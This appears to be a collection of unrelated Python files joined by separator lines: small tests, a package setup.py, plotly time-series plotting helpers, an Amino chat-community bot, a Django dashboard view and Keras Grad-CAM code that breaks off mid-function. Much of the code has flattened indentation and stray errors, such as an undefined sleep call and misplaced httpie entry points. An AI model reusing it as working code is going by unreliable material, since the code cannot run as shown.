time.sleep(1.0)
value = i.prop("text")
t.equals(value, "Hello WORLD", "Failed to read module value")
if __name__ == "__main__":
unittest.main()
|
"""Test permissions of the site to ensure we haven't given write access."""
import pytest
import urllib.request
import urllib.error
@pytest.mark.parametrize("method", ["PUT", "POST"])
def test_write_is_not_allowed(url, method):
"""Test that WRITE methods are not allowed."""
req = urllib.request.Request(url, data=b"", method=method)
with pytest.raises(expected_exception=urllib.error.HTTPError) as excinfo:
response = urllib.request.urlopen(req)
assert excinfo.value.code == 403
|
from nosem import project, executable, test
project('basic', 'cpp')
demo = executable('basic-demo', 'main.cpp')
test(demo.name(), demo)
|
from click.testing import CliRunner
from src.cli import cli
def test_cli():
"""Test CLI to import all commands without any error and exception
"""
runner = CliRunner()
result = runner.invoke(cli)
assert result.exit_code == 0
assert not result.exception
|
# This is purely the result of trial and error.
import os
import sys
import codecs
import subprocess
from setuptools import setup
from setuptools import find_packages
import aiowrpr
INSTALL_REQUIRES = [
'aiodns==2.0.0',
'aiohttp[speedups]>=3.7.4',
'aiohttp-apispec==2.1.0',
'apispec==3.2.0',
'async-timeout==3.0.1',
'attrs==19.3.0',
'brotlipy==0.7.0',
'cchardet==2.1.5',
'cffi==1.13.2',
'chardet==3.0.4',
'idna==2.8',
'marshmallow==3.3.0',
'multidict==4.7.1',
'pycares==3.1.0',
'pycparser==2.19',
'ujson==1.35',
'webargs>=5.5.3',
'yarl==1.4.2'
]
# Refuse to install on unsupported Python versions:
if sys.version_info < (3, 5) or sys.version_info > (3, 8):
sys.exit(
f"Sorry, Python {'.'.join(map(str, sys.version_info[:3]))} is not supported"
)
def long_description():
with codecs.open('README.md', encoding='utf8') as f_:
return f_.read()
# Fetch version from git tags, and write to version.py.
# Also, when git is not available (PyPi package), use stored version.py.
VERSION_PY = os.path.join(os.path.dirname(__file__), 'version.py')
try:
VERSION_GIT = str(subprocess.check_output(["git", "describe", "--tags"]).rstrip(), 'utf-8')
except Exception as _:
    with open(VERSION_PY, 'r') as fh:
        VERSION_GIT = fh.read().strip().split('=')[-1].replace('"', '')
VERSION_MSG = "# Do not edit this file, pipeline versioning is governed by git tags"
with open(VERSION_PY, 'w') as fh:
fh.write(f'{VERSION_MSG}{os.linesep}__version__={VERSION_GIT}')
setup(
name='aiowrpr',
version=VERSION_GIT,
description=aiowrpr.__doc__.strip(),
long_description=long_description(),
url='https://github.com/ishirshov/aiowrpr',
download_url='https://github.com/ishirshov/aiowrpr',
author=aiowrpr.__author__,
author_email='ildar.shirshov@gmail.com',
license=aiowrpr.__license__,
packages=find_packages(),
scripts=['bin/make_api'],
entry_points={
'console_scripts': [
'http = httpie.__main__:main',
'https = httpie.__main__:main',
],
},
install_requires=INSTALL_REQUIRES,
classifiers=[
'Development Status :: 1 - Planning',
'Programming Language :: Python',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Software Development',
'Topic :: System :: Networking',
'Topic :: Terminals',
'Topic :: Text Processing',
'Topic :: Utilities'
],
)
|
"""
Python Script used for plotting common timeseries charts
"""
# Data Manipulation
import pandas as pd
import numpy as np
from scipy.ndimage.interpolation import shift
# Data Visualization
from plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot
import plotly.express as px
from plotly.subplots import make_subplots
import plotly.graph_objects as go
init_notebook_mode(connected=True)
from ipywidgets import widgets, interact, interact_manual
from IPython.display import display, clear_output
from itertools import product
import functools
# Timeseries Manipulation
import statsmodels.api as sm
from statsmodels.tsa.stattools import acf
from statsmodels.graphics.tsaplots import plot_acf
# Other
import sys
import warnings
sys.path.append("../src")
import ts_preprocess, ts_models
def plot_rolling(ts, window):
"""
    Function that plots the rolling mean and standard deviation of the timeseries
    Args:
        ts(pd.Series): The timeseries to be plotted
        window(int): The size of the rolling window
Returns:
fig(plotly.fig): The figure value
"""
    #Determining rolling statistics
x = ts.index
rolmean = pd.Series(ts).rolling(window=window).mean().values
rolstd = pd.Series(ts).rolling(window=window).std().values
fig = go.Figure()
fig.add_trace(
go.Scatter(x=x, y=ts.values ,name = 'original_values'))
fig.add_trace(
go.Scatter(x=x, y=rolmean ,name = 'rolling_mean'))
fig.add_trace(
go.Scatter(x=x, y=rolstd ,name = 'rolling_std'))
fig.update_layout(title_text="Stationary Rolling Window")
return fig
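# Illustrative usage (assumes `ts` is a pandas Series with a datetime index):
#   fig = plot_rolling(ts, window=12)
#   fig.show()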
def plot_timerseries_decomposition(df, **kwargs):
"""
Function that plots the decomposition of the timeseries
The plot includes the following:
* Trend values
* Seasonal values
* Observed values
* Residual values
Args:
df(pd.DataFrame): The timeseries dataframe indexed with date
Returns:
fig: Plotly Figure
"""
ts_preprocess.validate_datetime_index(df, allow = False)
height = kwargs.get('height',800)
width = kwargs.get('width',1000)
title_text = kwargs.get('title_text', "Timeseries Components")
path_html = kwargs.get('path_html', None)
decomposition = ts_models.calculate_decompose(df, model='multiplicative')
fig = make_subplots(rows=4, cols=1)
x = decomposition.observed.index
fig.add_trace(
go.Scatter(x=x, y=decomposition.observed.values,name = 'Observed'),
row=1, col=1)
fig.add_trace(
go.Scatter(x=x, y=decomposition.trend.values,name = 'Trend'),
row=2, col=1)
fig.add_trace(
go.Scatter(x=x, y=decomposition.seasonal.values,name = 'Seasonal'),
row=3, col=1)
fig.add_trace(
go.Scatter(x=x, y=decomposition.resid.values,name = 'Residual'),
row=4, col=1)
fig.update_layout(height=height, width=width,
title_text=title_text)
if path_html is not None:
fig.write_html(path_html)
return fig.show()
def plot_autocorrelation(df, **kwargs):
"""
Function that plots the autocorrelation of a timeseries
Args:
df(pd.DataFrame): The timeseries dataframe indexed with date
Returns:
fig: Plotly Figure
"""
ts_preprocess.validate_datetime_index(df, allow = False)
nlags = kwargs.get('nlags',40)
alpha = kwargs.get('alpha',0.05)
qstat = kwargs.get('qstat',True)
fft = kwargs.get('fft',False)
height = kwargs.get('height',600)
width = kwargs.get('width',1000)
title_text = kwargs.get('title_text', "Timeseries Components")
path_html = kwargs.get('path_html', None)
# Get values for autocorrelation
cf,confint,qstat,pvalues = acf(df,nlags=nlags,alpha=alpha,qstat = qstat,fft=fft)
# Get Autocorrelation intervals for plotting
x = list(range(1,nlags+1))
y = cf
y_upper = 1-confint[:,1]
y_lower = (1-confint[:,1])*-1
# Draw vertical lines
shapes = list()
for i in zip(range(1,nlags+1),y):
shapes.append({'type': 'line',
'xref': 'x',
'yref': 'y',
'x0': i[0],
'y0': 0,
'x1': i[0],
'y1': i[1]})
layout = go.Layout(shapes=shapes)
fig = go.Figure([
go.Scatter(
x=x,
y=y,
fill=None,
fillcolor='rgba(0,0,255,0)',
line=dict(color='rgb(0,0,0)'),
mode='lines+markers',
name='Autocorrelation'
),
go.Scatter(
x=x,
y=y_upper,
fill='tozeroy',
fillcolor='rgba(0,0,255,.05)',
line=dict(color='rgba(255,255,255,0)'),
showlegend=False
),
go.Scatter(
x=x,
y=y_lower,
fill='tonextx',
fillcolor='rgba(0,0,255,.2)',
line=dict(color='rgba(255,255,255,0)'),
showlegend=False
)
])
fig.update_layout(layout)
fig.update_layout(title=title_text, xaxis_title = 'Lag', yaxis_title='ACF')
fig.update_layout(height=height, width=width)
if path_html is not None:
fig.write_html(path_html)
return fig.show()
def plot_timeseries_columns(df):
"""
Function that plots an interactive Timeseries plot
based on the available columns of the dataset
Args:
df(pd.DataFrame): The timeseries dataframe indexed with date
Returns:
fig: Plotly Figure
"""
v = ts_preprocess.validate_datetime_index(df, allow = True)
try:
column_list = list(df.columns)
except:
column_list =[df.name]
if isinstance(df,pd.Series):
is_series = True
xops = ["Series Index"]
xplaceholder = "NA"
elif v:
is_series = True
xops = ["Series Index"]
xplaceholder = df.index.name
else:
is_series = False
xops = column_list
xplaceholder = column_list[0]
def _plot(df,y,x,title, color):
"""
Support function that is called when the button is clicked
"""
if is_series is False:
fig = px.line(data_frame = df,
x=x,
y=y,
title=title, color = color)
else:
fig = px.line(data_frame = df,
y=y,
title=title)
return fig.show()
# Create Widgets
title = widgets.Text(value = " Chart Title",
placeholder = "Insert Title Here",
description = "Chart title",
disabled = False)
timeseries = widgets.Dropdown(options = column_list,
placeholder = column_list[0],
description = "(Y-Axis) Plot Column",
disabled = False)
xaxis = widgets.Dropdown(options = xops,
placeholder = xplaceholder,
description = "(X-Axis) Plot Column",
disabled = False)
color_selector = widgets.Dropdown(options = [None] + column_list,
placeholder = None,
description = "Select Color Column",
disabled = False)
heading = widgets.HBox([title])
second_row = widgets.HBox([xaxis,timeseries])
third_row = widgets.HBox([color_selector])
button = widgets.Button(description = "Generate Chart")
display(heading)
display(second_row)
display(third_row)
display(button)
def on_button_clicked(button):
"""
Function used for button click
"""
clear_output()
display(heading)
display(second_row)
display(third_row)
display(button)
_plot(df,y=timeseries.value,x=xaxis.value,
title=title.value, color=color_selector.value)
button.on_click(functools.partial(on_button_clicked))
def plot_exponential_smoothing_results(train,fcast,test=None,**kwargs):
"""
Function that plots the results of the function call exponential_smoothing
"""
height = kwargs.get('height',600)
width = kwargs.get('width',1000)
title_text = kwargs.get('title_text', "Model Results Exponential Smoothing")
path_html = kwargs.get('path_html', None)
x = train.index
fig = go.Figure()
fig.add_trace(
go.Scatter(x=x, y=train.values,name = 'Train'))
if test is not None:
fig.add_trace(
go.Scatter(x=test.index, y=test.values,name = 'Test'))
fig.add_trace(
go.Scatter(x=fcast.index, y=fcast.values,name = 'Forecast'))
fig.update_layout(height=height, width=width,
title_text=title_text)
if path_html is not None:
fig.write_html(path_html)
return fig.show()
def plot_errors(train,fcast,model,**kwargs):
"""
Support function to plot Residuals, One Step Errors
"""
height = kwargs.get('height',600)
width = kwargs.get('width',1000)
title_text = kwargs.get('title_text', "Residuals & One-Step Error")
path_html = kwargs.get('path_html', None)
errors = train.values-shift(fcast.values, 1,cval=train.values[0])
errors_perc = model.resid/train.values
fig = make_subplots(rows=3, cols=1)
fig.add_trace(
go.Scatter(x=fcast.index, y=model.resid,name = 'Residuals'), row=1,col=1)
fig.add_trace(
go.Scatter(x=fcast.index, y=errors,name = 'One Step Error'), row=2,col=1)
fig.add_trace(
go.Scatter(x=fcast.index, y=errors_perc,name = 'Resid %'), row=3,col=1)
fig.update_layout(height=height, width=width,
title_text=title_text)
if path_html is not None:
fig.write_html(path_html)
return fig.show()
def plot_scatter_matrix(df, trim_label = None, **kwargs):
"""
Function that plots the interactive scatter matrix
"""
height = kwargs.get('height',600)
width = kwargs.get('width',1000)
path_html = kwargs.get('path_html', None)
ops = tuple(df.columns)
if trim_label is None:
val = -1
else:
val = trim_label
def _plot(df,cols):
"""
Support function that is called when the button is clicked
"""
dimensions = []
for i in cols:
d = dict(label = i[4:val], values = df[i])
dimensions.append(d)
fig = go.Figure(data=go.Splom(dimensions=dimensions,
marker=dict(showscale=False,
line_color='white', line_width=0.5)))
fig.update_layout(height=height, width=width,font=dict(size=8))
if path_html is not None:
fig.write_html(path_html)
return fig.show()
# Create Widgets
col_widget = widgets.SelectMultiple(options=ops,value=(),rows=7,description='Select Columns:',disabled=False)
title = widgets.Text(value = " Chart Title",
placeholder = "Insert Title Here",
description = "Chart title",
disabled = False)
heading = widgets.HBox([title,col_widget])
button = widgets.Button(description = "Generate Chart")
display(heading)
display(button)
def on_button_clicked(button):
"""
Function used for button click
"""
clear_output()
display(heading)
display(button)
_plot(df,cols = col_widget.value)
button.on_click(functools.partial(on_button_clicked))
|
from urllib.request import urlopen
from datetime import datetime
from random import choice
from json import dumps, load, loads
from contextlib import suppress
from pathlib import Path
from uuid import uuid4
from threading import Thread
from .local_amino import Client, SubClient, ACM
from .commands import *
from .extensions import *
path_utilities = "utilities"
path_amino = f'{path_utilities}/amino_list'
def print_exception(exc):
print(repr(exc))
class Bot(SubClient, ACM):
def __init__(self, client: Client, community, prefix: str = "!", bio: str = None, activity: bool = False) -> None:
self.client = client
self.marche = True
self.prefix = prefix
self.bio_contents = bio
self.activity = activity
self.session = self.client.session
if isinstance(community, int):
self.community_id = community
self.community = self.client.get_community_info(comId=self.community_id)
self.community_amino_id = self.community.aminoId
else:
self.community_amino_id = community
self.informations = self.client.get_from_code(f"http://aminoapps.com/c/{community}")
self.community_id = self.informations.json["extensions"]["community"]["ndcId"]
self.community = self.client.get_community_info(comId=self.community_id)
self.community_name = self.community.name
super().__init__(comId=self.community_id, profile=self.client.profile)
try:
self.community_leader_agent_id = self.community.json["agent"]["uid"]
except Exception:
self.community_leader_agent_id = "-"
try:
self.community_staff_list = self.community.json["communityHeadList"]
except Exception:
self.community_staff_list = ""
if self.community_staff_list:
self.community_leaders = [elem["uid"] for elem in self.community_staff_list if elem["role"] in (100, 102)]
self.community_curators = [elem["uid"] for elem in self.community_staff_list if elem["role"] == 101]
self.community_staff = [elem["uid"] for elem in self.community_staff_list]
if not Path(f'{path_amino}/{self.community_amino_id}.json').exists():
self.create_community_file()
old_dict = self.get_file_dict()
new_dict = self.create_dict()
def do(k, v): old_dict[k] = v
def undo(k): del old_dict[k]
[do(k, v) for k, v in new_dict.items() if k not in old_dict]
        [undo(k) for k in list(old_dict.keys()) if k not in new_dict]  # drop keys no longer in the template
self.update_file(old_dict)
# self.subclient = SubClient(comId=self.community_id, profile=client.profile)
self.banned_words = self.get_file_info("banned_words")
self.locked_command = self.get_file_info("locked_command")
self.message_bvn = self.get_file_info("welcome")
self.welcome_chat = self.get_file_info("welcome_chat")
self.prefix = self.get_file_info("prefix")
self.favorite_users = self.get_file_info("favorite_users")
self.favorite_chats = self.get_file_info("favorite_chats")
self.update_file()
# self.activity_status("on")
new_users = self.get_all_users(start=0, size=30, type="recent")
self.new_users = [elem["uid"] for elem in new_users.json["userProfileList"]]
def create_community_file(self):
with open(f'{path_amino}/{self.community_amino_id}.json', 'w', encoding='utf8') as file:
dict = self.create_dict()
file.write(dumps(dict, sort_keys=False, indent=4))
def create_dict(self):
return {"welcome": "", "prefix": self.prefix, "welcome_chat": "", "locked_command": [], "favorite_users": [], "favorite_chats": [], "banned_words": []}
def get_dict(self):
return {"welcome": self.message_bvn, "prefix": self.prefix, "welcome_chat": self.welcome_chat, "locked_command": self.locked_command,
"favorite_users": self.favorite_users, "favorite_chats": self.favorite_chats, "banned_words": self.banned_words}
def update_file(self, dict=None):
if not dict:
dict = self.get_dict()
with open(f"{path_amino}/{self.community_amino_id}.json", "w", encoding="utf8") as file:
file.write(dumps(dict, sort_keys=False, indent=4))
def get_file_info(self, info: str = None):
with open(f"{path_amino}/{self.community_amino_id}.json", "r", encoding="utf8") as file:
return load(file)[info]
def get_file_dict(self, info: str = None):
with open(f"{path_amino}/{self.community_amino_id}.json", "r", encoding="utf8") as file:
return load(file)
def get_banned_words(self):
return self.banned_words
def set_prefix(self, prefix: str):
self.prefix = prefix
self.update_file()
def set_welcome_message(self, message: str):
self.message_bvn = message.replace('"', '“')
self.update_file()
def set_welcome_chat(self, chatId: str):
self.welcome_chat = chatId
self.update_file()
def add_favorite_users(self, value: str):
self.favorite_users.append(value)
self.update_file()
def add_favorite_chats(self, value: str):
self.favorite_chats.append(value)
self.update_file()
def add_banned_words(self, liste: list):
self.banned_words.extend(liste)
self.update_file()
def add_locked_command(self, liste: list):
self.locked_command.extend(liste)
self.update_file()
def remove_favorite_users(self, value: str):
liste = [value]
[self.favorite_users.remove(elem) for elem in liste if elem in self.favorite_users]
self.update_file()
def remove_favorite_chats(self, value: str):
liste = [value]
[self.favorite_chats.remove(elem) for elem in liste if elem in self.favorite_chats]
self.update_file()
def remove_banned_words(self, liste: list):
[self.banned_words.remove(elem) for elem in liste if elem in self.banned_words]
self.update_file()
def remove_locked_command(self, liste: list):
[self.locked_command.remove(elem) for elem in liste if elem in self.locked_command]
self.update_file()
def unset_welcome_chat(self):
self.welcome_chat = ""
self.update_file()
def is_in_staff(self, uid):
return uid in self.community_staff
def is_leader(self, uid):
return uid in self.community_leaders
def is_curator(self, uid):
return uid in self.community_curators
def is_agent(self, uid):
return uid == self.community_leader_agent_id
def accept_role(self, rid: str = None):
with suppress(Exception):
self.accept_organizer(rid)
return True
with suppress(Exception):
self.promotion(noticeId=rid)
return True
return False
def get_staff(self, community):
if isinstance(community, int):
with suppress(Exception):
                community = self.client.get_community_info(comId=community)
else:
try:
informations = self.client.get_from_code(f"http://aminoapps.com/c/{community}")
except Exception:
return False
community_id = informations.json["extensions"]["community"]["ndcId"]
community = self.client.get_community_info(comId=community_id)
try:
community_staff_list = community.json["communityHeadList"]
community_staff = [elem["uid"] for elem in community_staff_list]
except Exception:
community_staff_list = ""
else:
return community_staff
def get_user_id(self, name_or_id):
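        # Scan the member list in pages of 100 and return (nickname, uid) for an
        # exact nickname/uid match; otherwise fall back to the first
        # case-insensitive partial nickname match, or None if nothing matches.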
members = self.get_all_users(size=1).json['userProfileCount']
start = 0
lower_name = None
while start <= members:
users = self.get_all_users(start=start, size=100).json['userProfileList']
for user in users:
name = user['nickname']
uid = user['uid']
if name_or_id == name or name_or_id == uid:
return (name, uid)
if not lower_name and name_or_id.lower() in name.lower():
lower_name = (name, uid)
start += 100
return lower_name if lower_name else None
def ask_all_members(self, message, lvl: int = 20, type_bool: int = 1):
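        # Send `message` in a private chat to every member whose level matches:
        #   type_bool == 1 -> level == lvl, 2 -> level <= lvl, 3 -> level >= lvl.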
def ask(uid):
try:
self.start_chat(userId=[uid], message=message)
except Exception:
self.start_chat(userId=[uid], message=message)
size = self.get_all_users(start=0, size=1, type="recent").json['userProfileCount']
st = 0
while size > 0:
value = size
if value > 100:
value = 100
users = self.get_all_users(start=st, size=value)
if type_bool == 1:
[ask(user["uid"]) for user in users.json['userProfileList'] if user['level'] == lvl]
elif type_bool == 2:
[ask(user["uid"]) for user in users.json['userProfileList'] if user['level'] <= lvl]
elif type_bool == 3:
[ask(user["uid"]) for user in users.json['userProfileList'] if user['level'] >= lvl]
size -= 100
st += 100
def ask_amino_staff(self, message):
self.start_chat(userId=self.community_staff, message=message)
def get_chat_id(self, chat: str = None):
with suppress(Exception):
return self.get_from_code(f"http://aminoapps.com/c/{chat}").objectId
with suppress(Exception):
chati = self.get_from_code(f"{chat}").objectId
return chati
val = self.get_public_chat_threads()
for title, chat_id in zip(val.title, val.chatId):
if chat == title:
return chat_id
for title, chat_id in zip(val.title, val.chatId):
if chat.lower() in title.lower() or chat == chat_id:
return chat_id
return False
    def upload_bubble(self, file, comId):
        data = file
        response = self.session.post(f"https://service.narvii.com/api/v1/x{comId}/s/chat/chat-bubble/templates/107147e9-05c5-405f-8553-af65d2823457/generate", data=data, headers=self.headers)
        bid = loads(response.text)['chatBubble']['bubbleId']
        print(bid)
        response = self.session.post(f"https://service.narvii.com/api/v1/x{comId}/s/chat/chat-bubble/{bid}", data=data, headers=self.headers)
        if response.status_code != 200:
            return loads(response.text)
        else:
            return bid
def copy_bubble(self, chatId: str, replyId: str, comId: str = None):
if not comId:
comId = self.community_id
header = {
'Accept-Language': 'en-US',
'Content-Type': 'application/octet-stream',
'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 7.1; LG-UK495 Build/MRA58K; com.narvii.amino.master/3.3.33180)',
'Host': 'service.narvii.com',
'Accept-Encoding': 'gzip',
'Connection': 'Keep-Alive',
}
a = self.get_message_info(chatId=chatId, messageId=replyId).json["chatBubble"]["resourceUrl"]
with urlopen(a) as zipresp:
yo = zipresp.read()
response = self.session.post(f"https://service.narvii.com/api/v1/x{comId}/s/chat/chat-bubble/templates/107147e9-05c5-405f-8553-af65d2823457/generate", data=yo, headers=header)
bid = loads(response.text)['chatBubble']['bubbleId']
        response = self.session.post(f"https://service.narvii.com/api/v1/x{comId}/s/chat/chat-bubble/{bid}", data=yo, headers=header)
def stop_instance(self):
self.marche = False
def start_instance(self):
self.marche = True
Thread(target=self.passive).start()
def leave_amino(self):
self.marche = False
for elem in self.get_public_chat_threads().chatId:
with suppress(Exception):
self.leave_chat(elem)
self.client.leave_community(comId=self.community_id)
def check_new_member(self):
if not (self.message_bvn or self.welcome_chat):
return
new_list = self.get_all_users(start=0, size=25, type="recent")
new_member = [(elem["nickname"], elem["uid"]) for elem in new_list.json["userProfileList"]]
for elem in new_member:
name, uid = elem[0], elem[1]
val = self.get_wall_comments(userId=uid, sorting='newest').commentId
if not val and self.message_bvn:
with suppress(Exception):
self.comment(message=self.message_bvn, userId=uid)
if not val and self.welcome_chat:
with suppress(Exception):
self.invite_to_chat(chatId=self.welcome_chat, userId=uid)
new_users = self.get_all_users(start=0, size=30, type="recent")
self.new_users = [elem["uid"] for elem in new_users.json["userProfileList"]]
def welcome_new_member(self):
new_list = self.get_all_users(start=0, size=25, type="recent")
new_member = [(elem["nickname"], elem["uid"]) for elem in new_list.json["userProfileList"]]
for elem in new_member:
name, uid = elem[0], elem[1]
val = self.get_wall_comments(userId=uid, sorting='newest').commentId
            if (not val or uid not in self.new_users) and self.message_bvn:
with suppress(Exception):
self.comment(message=self.message_bvn, userId=uid)
if uid not in self.new_users and self.welcome_chat:
with suppress(Exception):
self.invite_to_chat(chatId=self.welcome_chat, userId=uid)
new_users = self.get_all_users(start=0, size=30, type="recent")
self.new_users = [elem["uid"] for elem in new_users.json["userProfileList"]]
def feature_chats(self):
for elem in self.favorite_chats:
with suppress(Exception):
self.favorite(time=2, chatId=elem)
def feature_users(self):
featured = [elem["uid"] for elem in self.get_featured_users().json["userProfileList"]]
for elem in self.favorite_users:
if elem not in featured:
with suppress(Exception):
self.favorite(time=1, userId=elem)
def get_member_level(self, uid):
return self.get_user_info(userId=uid).level
def get_member_titles(self, uid):
with suppress(Exception):
return self.get_user_info(userId=uid).customTitles
return False
def get_wallet_amount(self):
return self.client.get_wallet_info().totalCoins
def generate_transaction_id(self):
return str(uuid4())
def pay(self, coins: int = 0, blogId: str = None, chatId: str = None, objectId: str = None, transactionId: str = None):
if not transactionId:
transactionId = self.generate_transaction_id()
self.send_coins(coins=coins, blogId=blogId, chatId=chatId, objectId=objectId, transactionId=transactionId)
def favorite(self, time: int = 1, userId: str = None, chatId: str = None, blogId: str = None, wikiId: str = None):
self.feature(time=time, userId=userId, chatId=chatId, blogId=blogId, wikiId=wikiId)
def unfavorite(self, userId: str = None, chatId: str = None, blogId: str = None, wikiId: str = None):
self.unfeature(userId=userId, chatId=chatId, blogId=blogId, wikiId=wikiId)
def join_chatroom(self, chat: str = None, chatId: str = None):
if not chat:
with suppress(Exception):
self.join_chat(chatId)
return ""
with suppress(Exception):
chati = self.get_from_code(f"{chat}").objectId
self.join_chat(chati)
return chat
chats = self.get_public_chat_threads()
for title, chat_id in zip(chats.title, chats.chatId):
if chat == title:
self.join_chat(chat_id)
return title
chats = self.get_public_chat_threads()
for title, chat_id in zip(chats.title, chats.chatId):
if chat.lower() in title.lower() or chat == chat_id:
self.join_chat(chat_id)
return title
return False
def start_screen_room(self, chatId: str, joinType: int=1):
self.client.join_video_chat(comId=self.community_id, chatId=chatId, joinType=joinType)
def start_voice_room(self, chatId: str, joinType: int=1):
self.client.join_voice_chat(comId=self.community_id, chatId=chatId, joinType=joinType)
def join_screen_room(self, chatId: str, joinType: int=1):
self.client.join_video_chat_as_viewer(comId=self.community_id, chatId=chatId, joinType=joinType)
def get_chats(self):
return self.get_public_chat_threads()
def join_all_chat(self):
for elem in self.get_public_chat_threads().chatId:
with suppress(Exception):
self.join_chat(elem)
def leave_all_chats(self):
for elem in self.get_public_chat_threads().chatId:
with suppress(Exception):
self.leave_chat(elem)
def follow_user(self, uid):
self.follow(userId=[uid])
def unfollow_user(self, uid):
self.unfollow(userId=uid)
def add_title(self, uid: str, title: str, color: str = None):
member = self.get_member_titles(uid)
try:
titles = [i['title'] for i in member] + [title]
colors = [i['color'] for i in member] + [color]
except TypeError:
titles = [title]
colors = [color]
self.edit_titles(uid, titles, colors)
return True
    def remove_title(self, uid: str, title: str):
        member = self.get_member_titles(uid)
        if not member:
            return False
        tlist = []
        clist = []
        for t in member:
            if t["title"] != title:
                tlist.append(t["title"])
                clist.append(t["color"])
        self.edit_titles(uid, tlist, clist)
        return True
def passive(self):
def upt_activity():
timeNow = int(datetime.timestamp(datetime.now()))
timeEnd = timeNow + 300
try:
self.send_active_obj(startTime=timeNow, endTime=timeEnd)
except Exception:
pass
def change_bio_and_welcome_members():
if self.welcome_chat or self.message_bvn:
Thread(target=self.welcome_new_member).start()
try:
if isinstance(self.bio_contents, list):
self.edit_profile(content=choice(self.bio_contents))
elif isinstance(self.bio_contents, str):
self.edit_profile(content=self.bio_contents)
except Exception as e:
print_exception(e)
def feature_chats():
try:
Thread(target=self.feature_chats).start()
except Exception as e:
print_exception(e)
def feature_users():
try:
Thread(target=self.feature_users).start()
except Exception as e:
print_exception(e)
feature_chats()
feature_users()
j = 0
k = 0
while self.marche:
change_bio_and_welcome_members()
if j >= 24:
feature_chats()
j = 0
if k >= 288:
feature_users()
k = 0
if self.activity:
try:
self.activity_status('on')
except Exception:
pass
upt_activity()
slp(300)
j += 1
k += 1
|
from .cls import TextClassifier, main as predict_cls
from .det import TextDetector, main as predict_det
from .rec import TextRecognizer, main as predict_rec
from .system import TextSystem, main as predict_system
|
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.viewsets import ViewSet
from rest_framework.permissions import IsAuthenticated
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.admin.models import LogEntry
from django.urls import reverse
from dashboard.mixins import DashboardMixin
from dashboard.containers import DashboardContainer
from dashboard.serializers import DashboardSerializer
class DashboardViewSet(LoginRequiredMixin, ViewSet):
login_url = '/login/'
permission_classes = (IsAuthenticated, )
queryset = LogEntry.objects.all()[:20]
def list(self, request):
container = []
for entry in self._log_iterator():
obj = entry.get_edited_object()
title = obj.getTitle()
content = obj.getContent()
date = obj.create_date
url = obj.get_absolute_url()
author = str(entry.user.employee)
container.append(DashboardContainer(title, content, date, url, author))
return Response(DashboardSerializer(container, many=True).data)
def _log_iterator(self):
objects = [cls.__name__.lower() for cls in DashboardMixin.__subclasses__()]
        entries = LogEntry.objects.filter(action_flag=1, content_type__model__in=objects)[:20]
        for entry in entries:
yield entry
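# Illustrative wiring sketch (assumption: this registration would normally live in urls.py,
# and the 'dashboard' route prefix is a placeholder, not part of this module):
#   from rest_framework.routers import DefaultRouter
#   router = DefaultRouter()
#   router.register(r'dashboard', DashboardViewSet, basename='dashboard')
#   urlpatterns = router.urls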
|
import keras
import keras.backend as K
import os
import cv2
import numpy as np
import scipy.ndimage
def makedir_if_nexist(dir_list):
"""Create empty directory if it does not already exist
Parameters
----------
dir_list : list of str
List of directories to create
"""
for cur_dir in dir_list:
if not os.path.exists(cur_dir):
os.makedirs(cur_dir)
def resize_stack(stack, size):
"""Resize stack to specified 2D size
Parameters
----------
stack : numpy 4D array (size: B x C x H x W), where B = batch size, C = number of classes
The stack to be resized
size : list of int
The 2D size to be resized to
Returns
-------
stack : numpy 4D array (size: B x C x H x W), where B = batch size, C = number of classes
The resized stack
"""
old_stack = stack[:]
stack = np.zeros((stack.shape[0], stack.shape[1], size[0], size[1]))
for i in range(stack.shape[0]):
for j in range(stack.shape[1]):
stack[i, j] = cv2.resize(old_stack[i, j], (size[0], size[1]))
return stack
def find_final_layer(model):
"""Find final layer's name in model
Parameters
----------
model : keras.engine.sequential.Sequential object
The input model
Returns
-------
(final_layer) : str
The name of the final layer
"""
for iter_layer, layer in reversed(list(enumerate(model.layers))):
        if type(layer) == keras.layers.convolutional.Conv2D:
return model.layers[iter_layer+1].name
raise Exception('Could not find the final layer in provided HistoNet')
def get_grad_cam_weights(input_model, final_layer, dummy_image, should_normalize=True):
"""Obtain Grad-CAM weights of the model
Parameters
----------
input_model : keras.engine.sequential.Sequential object
The input model
final_layer : str
The name of the final layer
dummy_image : numpy 4D array (size: 1 x H x W x 3)
A dummy image to calculate gradients
should_normalize : bool, optional
Whether to normalize the gradients
Returns
-------
weights : numpy 2D array (size: F x C), where F = number of features, C = number of classes
The Grad-CAM weights of the model
"""
conv_output = input_model.get_layer(final_layer).output # activation_7
num_classes = input_model.output_shape[1]
num_feats = int(conv_output.shape[-1])
weights = np.zeros((num_feats, num_classes))
def normalize(x):
# utility function to normalize a tensor by its L2 norm
return x / (K.sqrt(K.mean(K.square(x))) + 1e-5)
for iter_class in range(input_model.output_shape[1]):
# Obtain the gradients from the classifier wrt. the final convolutional layer
y_c = input_model.layers[-2].output[0, iter_class]
if should_normalize:
grad = normalize(K.gradients(y_c, conv_output)[0])
else:
grad = K.gradients(y_c, conv_output)[0]
grad_func = K.function([input_model.layers[0].input, K.learning_phase()], [conv_output, grad])
conv_val, grad_val = grad_func([dummy_image, 0])
conv_val, grad_val = conv_val[0], grad_val[0]
# Apply 2D mean
weights[:, iter_class] = np.mean(grad_val, axis=(0, 1))
return weights
def grad_cam(input_model, weights, images, is_pass_threshold, final_layer, keep_inds, orig_sz=[224, 224], should_upsample=False):
"""Generate Grad-CAM
Parameters
----------
input_model : keras.engine.sequential.Sequential object
The input model
weights : numpy 2D array (size: F x C), where F = number of features, C = number of classes
The Grad-CAM weights of the model
images : numpy 4D array (size: B x H x W x 3), where B = batch size
The batch of input images
is_pass_threshold : numpy 2D bool array (size: B x C), where B = batch size, C = number of classes
An array saving which classes pass the pre-defined thresholds for each image in the batch
final_layer : str
The name of the final layer
keep_inds : numpy 1D array
Array of class indices to keep
orig_sz : list of int, optional
2D size of original images
should_upsample : bool, optional
Whether to upsample the generated Grad-CAM activation maps to original input size
Returns
-------
cams_thresh : numpy 4D array (size: B x H x W x C), B = batch size, C = number of classes
The thresholded Grad-CAMs
"""
# Obtain gradients and apply weights
conv_output = input_model.get_layer(final_layer).output # activation_7
